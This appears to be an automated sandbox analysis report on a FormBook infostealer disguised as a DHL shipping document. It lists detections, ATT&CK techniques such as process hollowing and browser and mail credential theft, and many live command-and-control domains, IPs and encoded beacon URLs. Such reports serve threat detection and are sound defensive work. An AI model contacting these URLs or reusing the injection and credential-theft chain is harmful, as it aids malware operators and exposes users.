          Source: C:\Windows\SysWOW64\help.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
          Source: C:\Windows\SysWOW64\help.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
          Source: C:\Windows\SysWOW64\help.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 3.2.eixfhzlwqd.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.eixfhzlwqd.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.581265823.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.357493625.0000000000900000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.581153913.0000000002900000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.357465550.00000000008D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.357347266.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.579126869.0000000000510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts1
          Shared Modules          		Path Interception1
          Access Token Manipulation          		1
          Deobfuscate/Decode Files or Information          		1
          OS Credential Dumping          		1
          System Time Discovery          		Remote Services1
          Archive Collected Data          		Exfiltration Over Other Network Medium3
          Ingress Tool Transfer          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
          System Shutdown/Reboot
          Default Accounts2
          Command and Scripting Interpreter          		Boot or Logon Initialization Scripts512
          Process Injection          		2
          Obfuscated Files or Information          		LSASS Memory2
          File and Directory Discovery          		Remote Desktop Protocol1
          Data from Local System          		Exfiltration Over Bluetooth1
          Encrypted Channel          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)11
          Software Packing          		Security Account Manager15
          System Information Discovery          		SMB/Windows Admin Shares1
          Email Collection          		Automated Exfiltration4
          Non-Application Layer Protocol          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)2
          Virtualization/Sandbox Evasion          		NTDS41
          Security Software Discovery          		Distributed Component Object Model1
          Clipboard Data          		Scheduled Transfer14
          Application Layer Protocol          		SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
          Access Token Manipulation          		LSA Secrets2
          Virtualization/Sandbox Evasion          		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common512
          Process Injection          		Cached Domain Credentials2
          Process Discovery          		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync1
          Application Window Discovery          		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
          Remote System Discovery          		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 830431 Sample: DHL_SHIPPING_DOCUMENT.exe Startdate: 20/03/2023 Architecture: WINDOWS Score: 100 35 Snort IDS alert for network traffic 2->35 37 Malicious sample detected (through community Yara rule) 2->37 39 Antivirus detection for URL or domain 2->39 41 3 other signatures 2->41 9 DHL_SHIPPING_DOCUMENT.exe 19 2->9         started        process3 file4 27 C:\Users\user\AppData\...\eixfhzlwqd.exe, PE32 9->27 dropped 12 eixfhzlwqd.exe 1 9->12         started        process5 signatures6 53 Detected unpacking (changes PE section rights) 12->53 55 Maps a DLL or memory area into another process 12->55 15 eixfhzlwqd.exe 12->15         started        18 conhost.exe 12->18         started        process7 signatures8 57 Modifies the context of a thread in another process (thread injection) 15->57 59 Maps a DLL or memory area into another process 15->59 61 Sample uses process hollowing technique 15->61 63 Queues an APC in another process (thread injection) 15->63 20 explorer.exe 3 1 15->20 injected process9 dnsIp10 29 motherhoodinthegarden.com 50.87.195.203, 49696, 49697, 80 UNIFIEDLAYER-AS-1US United States 20->29 31 luxgudonu.store 46.23.69.44, 49704, 49705, 80 UK2NET-ASGB United Kingdom 20->31 33 12 other IPs or domains 20->33 43 System process connects to network (likely due to code injection or exploit) 20->43 24 help.exe 13 20->24         started        signatures11 process12 signatures13 45 Tries to steal Mail credentials (via file / registry access) 24->45 47 Tries to harvest and steal browser information (history, passwords, etc) 24->47 49 Modifies the context of a thread in another process (thread injection) 24->49 51 Maps a DLL or memory area into another process 24->51

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          DHL_SHIPPING_DOCUMENT.exe26%ReversingLabsWin32.Trojan.Nsisx
          DHL_SHIPPING_DOCUMENT.exe39%VirustotalBrowse

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          3.2.eixfhzlwqd.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.2.eixfhzlwqd.exe.20a0000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.afzalhossainantor.com/d2a3/0%Avira URL Cloudsafe
          http://www.vanguardfsm.com/d2a3/0%Avira URL Cloudsafe
          http://www.afzalhossainantor.comwww.staatslieden.bizF7L99l=8qpwJ0%Avira URL Cloudsafe
          http://www.fresnocap.com/d2a3/0%Avira URL Cloudsafe
          http://www.on-smooth.comwww.luxgudonu.storeF7L99l=8qpwJ0%Avira URL Cloudsafe
          http://www.363ww.top0%Avira URL Cloudsafe
          http://www.sowmedia.site/d2a3/?F7L99l=8qpwJ&Mw=lIoejRloD0NPrvtjG56SffHGubt9bC7l7VozaPHGZoJbvkCik3wIcy97/aKLKqf+leC/SNQQ4bUyJkgTGWAXDnv4xxMA9hLjSw==100%Avira URL Cloudmalware
          http://www.espisys-technology.comwww.on-smooth.comF7L99l=8qpwJ)0%Avira URL Cloudsafe
          http://www.staatslieden.biz/d2a3/0%Avira URL Cloudsafe
          http://www.staatslieden.bizwww.fresnocap.comF7L99l=8qpwJ0%Avira URL Cloudsafe
          http://www.xefordbienhoa.com/d2a3/0%Avira URL Cloudsafe
          http://www.worldhortihealth.com0%Avira URL Cloudsafe
          http://www.getpay.life/d2a3/?F7L99l=8qpwJ&Mw=VQWJd0zbMmoZh8qz35kMD56sFoyc6gTYso/MZ3BJ/Q0NuTQy4/HeuFqYJgzXZamkeMaLAEsOyVyJpFsiRVW3jp2QSfHijAqmyw==100%Avira URL Cloudmalware
          http://www.worldhortihealth.comwww.afzalhossainantor.comF7L99l=8qpwJ0%Avira URL Cloudsafe
          http://www.363ww.top/d2a3/100%Avira URL Cloudmalware
          http://www.sowmedia.site100%Avira URL Cloudmalware
          http://perldancer.org/0%Avira URL Cloudsafe
          http://www.on-smooth.com/d2a3/100%Avira URL Cloudmalware
          http://www.luxgudonu.store/d2a3/100%Avira URL Cloudmalware
          http://www.espisys-technology.com0%Avira URL Cloudsafe
          http://www.sowmedia.site/d2a3/100%Avira URL Cloudmalware
          http://www.rw-bau.com/d2a3/100%Avira URL Cloudmalware
          http://www.motherhoodinthegarden.com/d2a3/?Mw=cN5AEPknHvfgRR2crmYFAZMRCOFajc7CFMghZAmOXZ6v62v+A/wOpED6FQaDJ/tGFUb6Y91ZfjLOaofoM8qmjHtlEGMmc9VxCg==&F7L99l=8qpwJ100%Avira URL Cloudmalware
          http://www.vanguardfsm.com0%Avira URL Cloudsafe
          http://www.afzalhossainantor.com0%Avira URL Cloudsafe
          http://www.on-smooth.com0%Avira URL Cloudsafe
          http://www.yh78898.com0%Avira URL Cloudsafe
          http://www.yh78898.com/d2a3/?Mw=/rn7tSorYChcOKKpyJYvjsebDE1EetOtUlfXV6ATVt8jMTNnk8PtnAR6Iam3VdBxJXQPah1uBiYgzGnhkXQp6MgBOVaGh7iMCA==&F7L99l=8qpwJ100%Avira URL Cloudmalware
          http://www.worldhortihealth.com/d2a3/100%Avira URL Cloudmalware
          http://www.fresnocap.com0%Avira URL Cloudsafe
          http://www.motherhoodinthegarden.com0%Avira URL Cloudsafe
          http://www.rw-bau.comwww.worldhortihealth.comF7L99l=8qpwJ0%Avira URL Cloudsafe
          http://www.espisys-technology.com/d2a3/100%Avira URL Cloudmalware
          http://www.getpay.life100%Avira URL Cloudmalware
          http://www.363ww.topwww.rw-bau.comF7L99l=8qpwJ0%Avira URL Cloudsafe
          http://www.vanguardfsm.comwww.xefordbienhoa.comF7L99l=8qpwJr0%Avira URL Cloudsafe
          http://www.luxgudonu.store0%Avira URL Cloudsafe
          http://www.luxgudonu.store/d2a3/?Mw=OjO/noXVMTk40sLqqWNUhETz5fwNQfL3iZv4zuTHX4FsBRg0F7vbWW3nqcxNlOGl4ZCA660VFsqTMG20zBTe2NhxC9mrQabZ6Q==&F7L99l=8qpwJ100%Avira URL Cloudmalware
          http://www.espisys-technology.com/d2a3/?Mw=HRt8t1hC6ylxzqu69JiO+2+wCg/IpDjUJ4ODvXLX3JGoHCx8OnZPShMSZXcaT/6Kc192JGOxG+z3HQLrZrJeLIMi1PhqwEBrHA==&F7L99l=8qpwJ100%Avira URL Cloudmalware
          http://www.motherhoodinthegarden.com/d2a3/100%Avira URL Cloudmalware
          http://www.xefordbienhoa.com0%Avira URL Cloudsafe
          http://www.versicherungsgott.com/d2a3/100%Avira URL Cloudmalware
          http://www.yh78898.com/d2a3/100%Avira URL Cloudmalware
          http://www.sowmedia.sitewww.yh78898.comF7L99l=8qpwJ0%Avira URL Cloudsafe
          http://motherhoodinthegarden.com/d2a3/?Mw=cN5AEPknHvfgRR2crmYFAZMRCOFajc7CFMghZAmOXZ6v62v100%Avira URL Cloudmalware
          http://www.rw-bau.com0%Avira URL Cloudsafe
          http://www.yh78898.comwww.363ww.topF7L99l=8qpwJ0%Avira URL Cloudsafe
          http://www.luxgudonu.storewww.sowmedia.siteF7L99l=8qpwJ0%Avira URL Cloudsafe
          http://www.on-smooth.com/d2a3/?F7L99l=8qpwJ&Mw=LnB6L7dnOzftoEr5UpUEPAqnd7gAmYo0E1h8Hr8XDrTV/RCVTRWGXzxgMAjKYD2ZiMi0DXBclY2V/N6w7Ub5K9/YRO3kcEW/Xg==100%Avira URL Cloudmalware
          http://www.versicherungsgott.com/d2a3/?F7L99l=8qpwJ&Mw=3fW4twhu5IX2LSkBcFVlWjxiVco4zHJfqjvATlwHU7q8puaymE5DWsW8adrpP96Z6UNtMOOwQnTRLGoNrAuApIzT11t8CH71vQ==100%Avira URL Cloudmalware
          http://www.staatslieden.biz0%Avira URL Cloudsafe
          http://www.getpay.life/d2a3/100%Avira URL Cloudmalware
          http://www.versicherungsgott.com0%Avira URL Cloudsafe
          http://www.fresnocap.comwww.vanguardfsm.comF7L99l=8qpwJ0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.363ww.top
          		39.109.117.109
          		truetrue
            		unknown
            www.getpay.life
            		199.192.28.110
            		truetrue
              		unknown
              www.espisys-technology.com
              		217.160.0.32
              		truetrue
                		unknown
                sowmedia.site
                		37.97.254.29
                		truetrue
                  		unknown
                  versicherungsgott.com
                  		81.169.145.88
                  		truetrue
                    		unknown
                    motherhoodinthegarden.com
                    		50.87.195.203
                    		truetrue
                      		unknown
                      www.yh78898.com
                      		104.233.254.113
                      		truetrue
                        		unknown
                        luxgudonu.store
                        		46.23.69.44
                        		truetrue
                          		unknown
                          on-smooth.com
                          		113.52.135.193
                          		truetrue
                            		unknown
                            www.luxgudonu.store
                            		unknown
                            		unknowntrue
                              		unknown
                              www.on-smooth.com
                              		unknown
                              		unknowntrue
                                		unknown
                                www.motherhoodinthegarden.com
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.versicherungsgott.com
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.sowmedia.site
                                    		unknown
                                    		unknowntrue
                                      		unknown

                                      Contacted URLs

                                      NameMaliciousAntivirus DetectionReputation
                                      http://www.sowmedia.site/d2a3/?F7L99l=8qpwJ&Mw=lIoejRloD0NPrvtjG56SffHGubt9bC7l7VozaPHGZoJbvkCik3wIcy97/aKLKqf+leC/SNQQ4bUyJkgTGWAXDnv4xxMA9hLjSw==true
                                      • Avira URL Cloud: malware
                                      		unknown
                                      http://www.on-smooth.com/d2a3/true
                                      • Avira URL Cloud: malware
                                      		unknown
                                      http://www.getpay.life/d2a3/?F7L99l=8qpwJ&Mw=VQWJd0zbMmoZh8qz35kMD56sFoyc6gTYso/MZ3BJ/Q0NuTQy4/HeuFqYJgzXZamkeMaLAEsOyVyJpFsiRVW3jp2QSfHijAqmyw==true
                                      • Avira URL Cloud: malware
                                      		unknown
                                      http://www.luxgudonu.store/d2a3/true
                                      • Avira URL Cloud: malware
                                      		unknown
                                      http://www.sowmedia.site/d2a3/true
                                      • Avira URL Cloud: malware
                                      		unknown
                                      http://www.motherhoodinthegarden.com/d2a3/?Mw=cN5AEPknHvfgRR2crmYFAZMRCOFajc7CFMghZAmOXZ6v62v+A/wOpED6FQaDJ/tGFUb6Y91ZfjLOaofoM8qmjHtlEGMmc9VxCg==&F7L99l=8qpwJtrue
                                      • Avira URL Cloud: malware
                                      		unknown
                                      http://www.yh78898.com/d2a3/?Mw=/rn7tSorYChcOKKpyJYvjsebDE1EetOtUlfXV6ATVt8jMTNnk8PtnAR6Iam3VdBxJXQPah1uBiYgzGnhkXQp6MgBOVaGh7iMCA==&F7L99l=8qpwJtrue
                                      • Avira URL Cloud: malware
                                      		unknown
                                      http://www.espisys-technology.com/d2a3/true
                                      • Avira URL Cloud: malware
                                      		unknown
                                      http://www.luxgudonu.store/d2a3/?Mw=OjO/noXVMTk40sLqqWNUhETz5fwNQfL3iZv4zuTHX4FsBRg0F7vbWW3nqcxNlOGl4ZCA660VFsqTMG20zBTe2NhxC9mrQabZ6Q==&F7L99l=8qpwJtrue
                                      • Avira URL Cloud: malware
                                      		unknown
                                      http://www.espisys-technology.com/d2a3/?Mw=HRt8t1hC6ylxzqu69JiO+2+wCg/IpDjUJ4ODvXLX3JGoHCx8OnZPShMSZXcaT/6Kc192JGOxG+z3HQLrZrJeLIMi1PhqwEBrHA==&F7L99l=8qpwJtrue
                                      • Avira URL Cloud: malware
                                      		unknown
                                      http://www.motherhoodinthegarden.com/d2a3/true
                                      • Avira URL Cloud: malware
                                      		unknown
                                      http://www.yh78898.com/d2a3/true
                                      • Avira URL Cloud: malware
                                      		unknown
                                      http://www.on-smooth.com/d2a3/?F7L99l=8qpwJ&Mw=LnB6L7dnOzftoEr5UpUEPAqnd7gAmYo0E1h8Hr8XDrTV/RCVTRWGXzxgMAjKYD2ZiMi0DXBclY2V/N6w7Ub5K9/YRO3kcEW/Xg==true
                                      • Avira URL Cloud: malware
                                      		unknown
                                      http://www.versicherungsgott.com/d2a3/?F7L99l=8qpwJ&Mw=3fW4twhu5IX2LSkBcFVlWjxiVco4zHJfqjvATlwHU7q8puaymE5DWsW8adrpP96Z6UNtMOOwQnTRLGoNrAuApIzT11t8CH71vQ==true
                                      • Avira URL Cloud: malware
                                      		unknown
                                      http://www.getpay.life/d2a3/true
                                      • Avira URL Cloud: malware
                                      		unknown

                                      URLs from Memory and Binaries

                                      NameSourceMaliciousAntivirus DetectionReputation
                                      https://duckduckgo.com/chrome_newtabhelp.exe, 00000005.00000003.398334454.000000000069B000.00000004.00000020.00020000.00000000.sdmp, 35-7052c.5.drfalse
                                        		high
                                        http://www.vanguardfsm.com/d2a3/explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.afzalhossainantor.com/d2a3/explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://duckduckgo.com/ac/?q=35-7052c.5.drfalse
                                          		high
                                          http://www.afzalhossainantor.comwww.staatslieden.bizF7L99l=8qpwJexplorer.exe, 00000004.00000003.557927500.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.451404045.0000000005A2E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		low
                                          http://perldancer.org/help.exe, 00000005.00000002.582591092.0000000003D30000.00000004.10000000.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.on-smooth.comwww.luxgudonu.storeF7L99l=8qpwJexplorer.exe, 00000004.00000003.451404045.0000000005A2E000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		low
                                          http://www.espisys-technology.comwww.on-smooth.comF7L99l=8qpwJ)explorer.exe, 00000004.00000003.451404045.0000000005A2E000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		low
                                          https://search.yahoo.com?fr=crmas_sfpfhelp.exe, 00000005.00000003.398334454.000000000069B000.00000004.00000020.00020000.00000000.sdmp, 35-7052c.5.drfalse
                                            		high
                                            http://www.363ww.topexplorer.exe, 00000004.00000003.557927500.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.451404045.0000000005A2E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.fresnocap.com/d2a3/explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.sowmedia.siteexplorer.exe, 00000004.00000003.557927500.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.451404045.0000000005A2E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmptrue
                                            • Avira URL Cloud: malware
                                            		unknown
                                            http://www.staatslieden.biz/d2a3/explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.xefordbienhoa.com/d2a3/explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.363ww.top/d2a3/explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmptrue
                                            • Avira URL Cloud: malware
                                            		unknown
                                            http://www.staatslieden.bizwww.fresnocap.comF7L99l=8qpwJexplorer.exe, 00000004.00000003.557927500.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.451404045.0000000005A2E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		low
                                            http://www.worldhortihealth.comexplorer.exe, 00000004.00000003.557927500.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.451404045.0000000005A2E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.worldhortihealth.comwww.afzalhossainantor.comF7L99l=8qpwJexplorer.exe, 00000004.00000003.557927500.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.451404045.0000000005A2E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		low
                                            http://www.espisys-technology.comexplorer.exe, 00000004.00000003.557927500.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.451404045.0000000005A2E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.rw-bau.com/d2a3/explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmptrue
                                            • Avira URL Cloud: malware
                                            		unknown
                                            http://www.afzalhossainantor.comexplorer.exe, 00000004.00000003.557927500.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.451404045.0000000005A2E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.motherhoodinthegarden.comexplorer.exe, 00000004.00000003.557927500.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.451404045.0000000005A2E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.vanguardfsm.comexplorer.exe, 00000004.00000003.557927500.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.451404045.0000000005A2E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.on-smooth.comexplorer.exe, 00000004.00000003.557927500.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.451404045.0000000005A2E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.yh78898.comexplorer.exe, 00000004.00000003.557927500.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.451404045.0000000005A2E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.fresnocap.comexplorer.exe, 00000004.00000003.557927500.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.451404045.0000000005A2E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.worldhortihealth.com/d2a3/explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmptrue
                                            • Avira URL Cloud: malware
                                            		unknown
                                            http://www.rw-bau.comwww.worldhortihealth.comF7L99l=8qpwJexplorer.exe, 00000004.00000003.557927500.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.451404045.0000000005A2E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		low
                                            https://www.google.com/images/branding/product/ico/googleg_lodp.icohelp.exe, 00000005.00000003.398334454.000000000069B000.00000004.00000020.00020000.00000000.sdmp, 35-7052c.5.drfalse
                                              		high
                                              http://www.getpay.lifeexplorer.exe, 00000004.00000003.557927500.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.451404045.0000000005A2E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: malware
                                              		unknown
                                              http://www.363ww.topwww.rw-bau.comF7L99l=8qpwJexplorer.exe, 00000004.00000003.557927500.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.451404045.0000000005A2E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		low
                                              http://www.vanguardfsm.comwww.xefordbienhoa.comF7L99l=8qpwJrexplorer.exe, 00000004.00000003.557927500.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.451404045.0000000005A2E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		low
                                              http://www.luxgudonu.storeexplorer.exe, 00000004.00000003.557927500.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.451404045.0000000005A2E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=35-7052c.5.drfalse
                                                		high
                                                http://www.sowmedia.sitewww.yh78898.comF7L99l=8qpwJexplorer.exe, 00000004.00000003.451404045.0000000005A2E000.00000004.00000001.00020000.00000000.sdmptrue
                                                • Avira URL Cloud: safe
                                                		low
                                                https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchhelp.exe, 00000005.00000003.398334454.000000000069B000.00000004.00000020.00020000.00000000.sdmp, 35-7052c.5.drfalse
                                                  		high
                                                  http://nsis.sf.net/NSIS_ErrorErrorDHL_SHIPPING_DOCUMENT.exefalse
                                                    		high
                                                    https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=help.exe, 00000005.00000003.398334454.000000000069B000.00000004.00000020.00020000.00000000.sdmp, 35-7052c.5.drfalse
                                                      		high
                                                      http://www.xefordbienhoa.comexplorer.exe, 00000004.00000003.557927500.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.451404045.0000000005A2E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.versicherungsgott.com/d2a3/explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      https://ac.ecosia.org/autocomplete?q=35-7052c.5.drfalse
                                                        		high
                                                        https://search.yahoo.com?fr=crmas_sfphelp.exe, 00000005.00000003.398334454.000000000069B000.00000004.00000020.00020000.00000000.sdmp, 35-7052c.5.drfalse
                                                          		high
                                                          http://motherhoodinthegarden.com/d2a3/?Mw=cN5AEPknHvfgRR2crmYFAZMRCOFajc7CFMghZAmOXZ6v62vhelp.exe, 00000005.00000002.582591092.00000000036E8000.00000004.10000000.00040000.00000000.sdmpfalse
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          http://www.rw-bau.comexplorer.exe, 00000004.00000003.557927500.0000000005A9E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.451404045.0000000005A2E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.585709062.0000000005A9E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.yh78898.comwww.363ww.topF7L99l=8qpwJexplorer.exe, 00000004.00000003.451404045.0000000005A2E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		low
                                                          http://www.luxgudonu.storewww.sowmedia.siteF7L99l=8qpwJexplorer.exe, 00000004.00000003.451404045.0000000005A2E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		low
